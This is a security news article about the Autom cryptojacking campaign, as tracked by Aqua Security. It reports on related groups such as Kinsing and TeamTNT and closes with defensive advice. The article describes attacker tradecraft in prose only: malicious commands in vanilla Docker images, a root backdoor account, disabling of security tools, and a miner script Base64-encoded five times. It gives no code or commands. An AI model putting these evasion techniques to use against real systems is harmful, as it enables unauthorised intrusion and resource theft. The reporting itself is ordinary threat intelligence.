According to new data presented today, a continuous crypto mining campaign has updated its arsenal while improving its defence evasion strategies, allowing threat actors to mask incursions and fly under the radar.
According to researchers from DevSecOps and cloud security firm Aqua Security, who have been tracking the malware operation for the past three years, 84 attacks against its honeypot servers have been reported to date, four of which occurred in 2021. However, 125 incidents were discovered in the wild in the third quarter of 2021 alone, indicating that the attacks are not abating.
When a vanilla image named “alpine:latest” was run, a malicious command was executed, resulting in the download of a shell script named “autom.sh.”
“Most businesses trust the official pictures and allow their use,” the researchers wrote in a study shared with The Hacker News. “Adversaries routinely employ vanilla images together with malicious commands to accomplish their attacks.” “The malicious command that was added to the official image to carry out the attack hasn’t changed much over the years. The server from which the shell script autom.sh was downloaded is the main difference.”
The shell script starts the attack by allowing the adversary to create a new user account called “akay” and upgrade its privileges to root user, allowing the adversary to run arbitrary commands on the compromised machine in order to mine cryptocurrency.
Although the mining activity was not hidden in the early stages of the campaign in 2019, later versions show the extreme measures taken by its developers to keep it hidden from detection and inspection, the most notable of which is the ability to disable security mechanisms and retrieve an obfuscated mining shell script that was Base64-encoded five times to get around security tools.
Multiple threat actors have dominated malware campaigns aimed at hijacking computers to mine cryptocurrencies, such as Kinsing, which has been discovered scanning the internet for misconfigured Docker servers in order to break into unprotected hosts and install a previously undocumented coin miner strain.
Furthermore, a hacking group known as TeamTNT has been seen targeting unsecured Redis database servers, Alibaba Elastic Computing Service (ECS) instances, exposed Docker APIs, and vulnerable Kubernetes clusters in order to execute malicious code with root privileges as well as deploy cryptocurrency-mining payloads and credential stealers. Additionally, malicious images were hosted on compromised Docker Hub accounts, which were then used to distribute cryptocurrency miners.
“Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash,” Sophos senior threat researcher Sean Gallagher wrote in an analysis of a Tor2Mine mining campaign, which uses a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials.
Security holes in the Log4j logging library, as well as newly discovered vulnerabilities in Atlassian Confluence, F5 BIG-IP, VMware vCenter, and Oracle WebLogic Servers, have been exploited in recent weeks to take control of workstations and mine bitcoins, a practise known as cryptojacking. QNAP, a manufacturer of network-attached storage (NAS) appliances, issued a warning earlier this month about bitcoin mining malware that may eat up to half of a device’s CPU.
“The Autom campaign demonstrates that attackers are growing more smart, improving their strategies and abilities to elude detection by security systems,” the researchers stated. To defend against these attacks, it’s a good idea to keep an eye on suspicious container activity, run dynamic image analysis, and check the environment for misconfiguration concerns on a regular basis.